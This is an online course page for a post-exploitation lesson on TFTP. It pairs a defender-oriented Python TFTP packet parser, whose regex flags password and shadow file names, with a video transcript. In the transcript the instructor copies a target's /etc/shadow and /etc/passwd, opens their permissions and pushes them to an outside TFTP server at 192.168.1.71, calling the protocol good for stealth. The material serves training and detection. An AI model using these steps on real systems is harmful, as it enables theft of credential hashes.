Time
7 hours 47 minutes
Difficulty
Advanced
CEU/CPE
10

Video Description

This lesson focuses on the Trivial File Transfer Protocol (TFTP). It walks participants step by step through using the tftp command. TFTP can be used to send files out to a target TFTP server, including pushing out the password and shadow files.
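The lesson works at the level of the tftp client prompt (connect, mode, put, get). As an added example that is not code from the course or the instructor, the following Python decodes the underlying TFTP packets (RFC 1350 opcodes: read/write request, data, ack, error) and walks a constructed exchange that mirrors the video's put of a 10-byte file: a write request, ack 0, one data block, ack 1. Run over captured UDP payloads, the same logic lets a defender see which file names are moving over TFTP and flag requests for password or shadow files. The host labels, packet contents and the sensitive-name pattern are constructed for illustration.

```python
import re
import struct

# TFTP opcodes (RFC 1350)
OP_RRQ, OP_WRQ, OP_DATA, OP_ACK, OP_ERROR = 1, 2, 3, 4, 5
BLOCK_SIZE = 512  # a DATA packet shorter than this ends the transfer

# Constructed watch-list: names a defender would not expect to see moving over TFTP
SENSITIVE = re.compile(r"(^|/)(shadow|passwd|gshadow)\w*(\.\w+)?$", re.IGNORECASE)


def parse_tftp(payload: bytes) -> dict:
    """Decode one TFTP UDP payload into a dict describing the packet."""
    if len(payload) < 2:
        raise ValueError("payload too short for a TFTP opcode")
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode in (OP_RRQ, OP_WRQ):
        # filename NUL mode NUL; splitting leaves a trailing empty element
        fields = payload[2:].split(b"\x00")
        if len(fields) < 3:
            raise ValueError("request missing NUL-terminated filename/mode")
        return {"op": "RRQ" if opcode == OP_RRQ else "WRQ",
                "filename": fields[0].decode("ascii", "replace"),
                "mode": fields[1].decode("ascii", "replace").lower()}
    if len(payload) < 4:
        raise ValueError("payload too short for a block number or error code")
    (num,) = struct.unpack("!H", payload[2:4])
    if opcode == OP_DATA:
        data = payload[4:]
        return {"op": "DATA", "block": num, "data": data, "last": len(data) < BLOCK_SIZE}
    if opcode == OP_ACK:
        return {"op": "ACK", "block": num}
    if opcode == OP_ERROR:
        msg = payload[4:].split(b"\x00")[0].decode("ascii", "replace")
        return {"op": "ERROR", "code": num, "message": msg}
    raise ValueError(f"unknown TFTP opcode {opcode}")


def analyze_session(packets) -> dict:
    """Walk one TFTP exchange given as a list of (sender, payload).

    Returns the request seen, the total bytes carried in DATA packets, whether
    the transfer completed (the final short DATA block was acknowledged), and
    alerts for requests naming sensitive files or for ERROR packets."""
    summary = {"request": None, "bytes": 0, "completed": False, "alerts": []}
    last_block = None
    for sender, payload in packets:
        pkt = parse_tftp(payload)
        if pkt["op"] in ("RRQ", "WRQ"):
            summary["request"] = pkt
            if SENSITIVE.search(pkt["filename"]):
                summary["alerts"].append(
                    f"{sender} sent {pkt['op']} for sensitive file {pkt['filename']!r}")
        elif pkt["op"] == "DATA":
            summary["bytes"] += len(pkt["data"])
            last_block = pkt["block"] if pkt["last"] else None
        elif pkt["op"] == "ACK" and last_block is not None and pkt["block"] == last_block:
            summary["completed"] = True
        elif pkt["op"] == "ERROR":
            summary["alerts"].append(f"{sender} sent ERROR {pkt['code']}: {pkt['message']}")
    return summary


# Builders used only to construct the sample packets below
def build_request(opcode: int, filename: str, mode: str = "octet") -> bytes:
    return struct.pack("!H", opcode) + filename.encode() + b"\x00" + mode.encode() + b"\x00"


def build_data(block: int, data: bytes) -> bytes:
    return struct.pack("!HH", OP_DATA, block) + data


def build_ack(block: int) -> bytes:
    return struct.pack("!HH", OP_ACK, block)


# Constructed exchange: a put of a 10-byte file named shadow.txt (WRQ, ACK 0, DATA 1, ACK 1)
SAMPLE_PUT = [
    ("client", build_request(OP_WRQ, "shadow.txt")),
    ("server", build_ack(0)),
    ("client", build_data(1, b"0123456789")),
    ("server", build_ack(1)),
]

# Constructed exchange: a get of test.txt (RRQ, DATA 1 from the server, ACK 1 from the client)
SAMPLE_GET = [
    ("client", build_request(OP_RRQ, "test.txt")),
    ("server", build_data(1, b"hello tftp")),
    ("client", build_ack(1)),
]

if __name__ == "__main__":
    for name, session in (("put", SAMPLE_PUT), ("get", SAMPLE_GET)):
        print(name, analyze_session(session))
```

Because TFTP carries the file name in clear text in the very first packet, a capture or an IDS rule on UDP port 69 can alert on the request before any data block is acknowledged; the `mode` field (netascii or octet) is the value the client's `mode` command sets.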

Video Transcription

00:04
Hello, viewers. This video is a bit of an aside from the rest of the program; it's not actually part of the
00:10
information gathering or the backdooring or the covering tracks. But it's something that I wanted to take time to cover very quickly because, like the slides that I had at the beginning of the lecture portion,
00:21
this is something that you're going to want to know when you're working on this sort of thing. The specific thing I am talking about is TFTP. I'm sure you've heard of FTP,
00:32
which is File Transfer Protocol. TFTP is just the Trivial File Transfer Protocol. It's the UDP version. It doesn't use much checking and
00:42
it's a little bit less reliable, but it is good for being stealthy.
00:46
So
00:47
just to demonstrate how it works,
00:50
I went ahead and created a file, which is just this test.txt,
00:54
and we're going to drop that onto
00:57
the far machine, on which I currently have a TFTP server running. What you would be doing is, on whatever your outside machine was that handles the tools and things on it that you wanted, you would just set that up with whatever your favorite FTP server or TFTP server might be. There are some great open-source ones out there; checking out GitHub, SourceForge, anything like that
01:15
is a great way to find them.
01:18
So you've got that set up on your far machine.
01:23
And then on your target, in this case we'll use Linux because it's an easy setup, and I can demonstrate it very quickly.
01:32
So you type tftp,
01:34
and then you just hit enter,
01:37
and it brings up a special prompt, which is the tftp prompt. There are
01:41
far fewer commands in this one. To get help and find out what the commands are, you just put a question mark.
01:47
You see connect, mode, put, get, quit, verbose, trace, status, binary, ascii, rexmt, timeout.
01:53
The first thing we're gonna want to do is
01:57
turn verbose mode on.
01:59
We're gonna go ahead and do a connect now. These can be abbreviated, so all you need is actually the first letter. I tend to write a few letters in, just so that I know what I'm talking about and you can keep track.
02:09
We're gonna connect to that. We're going to connect to the TFTP port 69, which is just
02:15
what's configured on the far machine. You can configure it to any port. This actually isn't the native TFTP port, but that's not important.
02:23
So we're going to connect to that.
02:25
And then we're gonna go ahead and do a put. So put is to send files out,
02:31
you recall. We've been doing the "totally not hacking your stuff" text file for a while.
02:37
Once you've finished all of that and you've gathered all the data you want,
02:40
then you obviously put this in there.
02:45
You would put that file on your target, the TFTP server.
02:50
So you do put, and you see it sent 10 bytes. It was just a quick little bit to show you that it sends it, and it shows you what it's actually doing.
02:58
And then we're gonna exit this.
03:00
We're gonna exit tftp.
03:02
Do a clear.
03:06
You see, that file obviously is still here. We're gonna change that. Remove it.
03:09
So we can demonstrate getting.
03:15
So we're back in our tftp. We
03:20
put verbose mode back on, we connect to 192.168.1.71
03:24
69
03:27
And we get
03:30
test.txt.
03:34
All right, we got it. So then we quit out.
03:38
Clear,
03:38
Clear. There we go.
03:40
And ls, and sure enough, the file's back,
03:45
and that's useful and handy in terms of this sort of vague concept. But
03:49
what about something a little bit more interesting? Maybe pushing out the password and shadow files.
03:57
Well,
03:59
these files are Linux-native files, files that pretty much everyone should know about.
04:03
We didn't really cover them in our information gathering step,
04:08
just because I showed you where you would find those files. And generally speaking, going into this, it's sort of expected that you'll know
04:15
about those particular password files.
04:17
Um,
04:18
but in case you aren't aware of what they are:
04:21
shadow, which is the /etc/shadow file.
04:28
We're going to less that;
04:30
well, sudo it.
04:32
So you have to have sudo for /etc/shadow, which is important because you can see
04:36
it contains password hashes,
04:41
which is very handy. You also see that on this generic computer machine there are lots of things that don't actually have passwords, you know, whatever.
04:49
So you see a password hash right here,
04:53
and that's basically,
04:56
well, it's not basically, that's just how the passwords are stored. It will hash the password you entered when you're trying to verify as being someone specific.
05:04
And that's how it will compare to see if you got the right password.
05:09
/etc/passwd,
05:11
Funnily enough,
05:12
does not contain passwords.
05:14
It contains usernames, groups, all sorts of information about that. But it has an x where the password hash would be located.
05:21
It also contains your default shell
05:25
and all sorts of fun: your user ID, group ID, et cetera.
05:29
So
05:30
we're gonna go ahead and do tftp,
05:33
we're gonna do put... well, we're gonna do a connect first,
05:39
192.168.1.71,
05:43
then we're gonna try putting /etc/shadow.
05:48
So that's kind of an interesting problem that you run into with /etc/shadow
05:55
and /etc/passwd.
05:57
Linux doesn't want you to do that. You can't just straight drop those. So what you gotta do
06:02
is
06:04
cp
06:11
Error.
06:12
And make sure we're using the right commands. We're gonna copy
06:15
/etc/shadow
06:18
to shadow.txt.
06:21
Well,
06:25
then we're going to copy
06:30
/etc/passwd to passwd.txt. Now notice here, and this is another useful little quick Linux trick that you want to check out:
06:39
in this one we type the full path, and in this one we just type the relative path.
06:43
The difference is simple. This is so that we can address something that's in another
06:46
place in the overall directory tree, whereas this
06:49
will just drop it into our current directory, so we don't have to move around.
06:55
So we'll ls to make sure they're both here.
06:57
Cool, they are. And we open back up our tftp,
07:00
v, c 192.168.1.71, that one.
07:09
And we put
07:11
passwd.txt shadow.txt.
07:16
Let's go ahead and change that. So what I actually just did, rather than what I intended to do,
07:21
was actually put passwd.txt, putting that file
07:26
under a different name on the far server. So we'll do it this way, so we actually have it right. We'll put
07:31
shadow.txt.
07:38
So since I made a boo-boo, I'm gonna have to do shadow1.txt.
07:43
There we go.
07:48
Anything can happen on a live show, folks,
08:01
including a fun little permissions problem.
08:05
So why are we running into that?
08:09
Well, let's see,
08:11
This is another example, another case where we can
08:13
do some Linux foo and learn some interesting stuff,
08:18
and we see that the shadow is owned and controlled by root.
08:24
So now we've got to do something a little fancy.
08:26
This is a chmod.
08:28
It actually is a permissions change.
08:33
Now, there are lots of very specific, very careful things you should be doing. You should understand what each of these means if you're going to be changing permissions, so that you can precisely change it
08:43
and make sure you don't mess up any file information or put anything where it shouldn't be.
08:46
You should always be very, very careful. And you should not do
08:50
what I'm about to do,
08:52
which is to wholesale change shadow.txt
08:56
to full permissions.
09:00
So we do ls -la. This time we'll grep for shadow,
09:07
and we see that it is willing to do anything we tell it. It will attempt to execute this file, which tends to go poorly. But we can try it out;
09:13
as you can see, it tends to go poorly.
09:16
But we know that we're allowed to touch it now. So maybe that will fix our problem.
09:22
tftp, v, c,
09:31
p
09:33
shadow.txt.
09:35
All right,
09:37
so it looks like it worked. Everything seems to be
09:41
good to go.
09:41
Let's see,
09:45
We're going to remove shadow.txt.
09:48
We're going to remove passwd.txt.
09:58
Do a grep
10:01
for everything .txt.
10:03
And we see only our old file that we downloaded a little bit ago is there.
10:07
All right,
10:09
so
10:09
that's all good to go, and we're ready, set. So we're gonna do tftp one more time.
10:16
Make sure we can actually see, and then get those files back:
10:24
get shadow.txt
10:28
get passwd.txt
10:33
and quit.
10:41
And you see that with TFTP, and I mentioned before that it's supposedly a
10:48
low
10:48
reliability protocol, one that doesn't take too much care in making sure it's got the right thing. But you see that it came through just fine. In general, most of your software, most of your tools, are gonna come through without any problems.
11:01
Data transfer over the short network space is not typically very hard, and you're not gonna have a problem with it. But again, you did see
11:07
how TFTP works, and it is very useful for sending and receiving files. We also got to do a little bit of Linux learning while we were in the process, just so you could get a sense of what password files to look after,
11:18
Um,
11:18
and just to kind of get a sense of where everything's stored.
11:22
So with that, I'll pretty well leave you on this video. And I think
11:26
you're pretty well ready to go with TFTP. Obviously, if you're uncomfortable with it, or even if you are comfortable with it but you'd like to be more comfortable with it, go ahead and download your own server, run your own client, and kind of play around with it and see how it works.
11:41
It will be an invaluable tool to you as you go forward in the post exploitation world.
11:46
With that, this has been me, Joseph Perry, signing off until next time. I hope you learned a bunch.

Up Next

Post Exploitation Hacking

In this self-paced online training course, you will cover three main topics: Information Gathering, Backdooring and Covering Steps; how to use system-specific tools to get general information; and listener shells, Metasploit and Meterpreter scripting.

Instructed By

Joe Perry
Senior Technical Instructor at FireEye, Inc
Instructor